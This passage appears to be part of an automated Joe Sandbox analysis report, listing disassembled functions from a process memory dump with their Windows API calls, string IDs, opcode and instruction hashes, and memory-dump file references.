                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 73e4c44dfbde5e49fbc3b488a708611a0aeefbb9cbcf1d128f38fa5b779dfd95
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1114F22A08A4F86FB906B24E54407CEAA4FF49765FD45376D92F467F0DEBCE4448610
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1529584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 15b6ed972d5416d79eac90ec8da7a322252691fe5da477b5a8b52c8d4c00e8d2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B115422B04B4A8AFB50EF61E84416C73A4F719758FD00A35EA6E47B64EFBCD2948350
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D15371F9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D153720D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D1537300
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1535740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7D15375C4,?,?,00000000,00007FF7D1536999,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D1535744
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 455305043-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c185ba3db837f3204d5a789c632b7c211f3ba25501763ef2bcfc242354807484
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B361A262F18A8B85FF61AB5594102BDA3A1EF84B80FD44433EA0F47765EFBCD5058320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1511DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2401724867-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b1b4dbbed94fe83ace1ffe4ee83c7f8148ccfb1dc82a6876d8b1672479fb37ef
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8519F62B0868B85FB21AF21D8502BDB3A0EB49B94FD44176DA5F476B4EFBCD045C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3849470556-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d1612e03fd0c16682ba2ca1a0f2759109ac8d81b439d0d846e1ebae818eb32b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2514722A4864B85FB66AF16E44427DB6A0FB44B54FD18436DA5F432A1DFBCE890C370
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D1539A10
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1539994
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A77A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A850
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00007FF7D1539A62
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$.
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3242694432-4275322459
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e45d200b54c4f622c27afed47b75a3f36adf12eaee8089f288f3be54d7564e5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9419F61A0964B85FF11BB5190502BDE2A0AF867A0FD44236DD5F077E5EFFCE4828360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15354B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D15354E6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D153552E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7D1536999,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15375AE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7D1536999,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15375C6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 779401067-630742106
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f416a403220271bb9541fa4ca1aee5169419154f3707bffaa39f21993951511c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3951767262868B81FB51AB11E4017FEE361EF94784FD05033DA4F4BA65DEBCE5458720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 238703822-3780739392
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d3567b6efcd5d8ba320e2947850ad0ede8341a64a56949b279e31717d43b0b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B11225360864A81FB24AB61E80127DF6A0EF89799FC58133DE0E477B5EF7CD0418724
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15158D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-3870813718
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b7a26f1bfd40825f8261a113f7500907015f6394d2db595a66b0ebac51271b2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32113D76618A4A97E710AF10E44026EF760FB8A764FD04132DA8E02778DFBCC048CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1514C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcsrchr$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 110935159-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f06c7a11d847e804fe1bf429bb5638754f5780586fe6ea91fd2b119fbd7b981c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0151B422B0978B85FF21AB1194003FDE291AF48BA4FC94532CD5F4B7A5DF7CE5818220
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
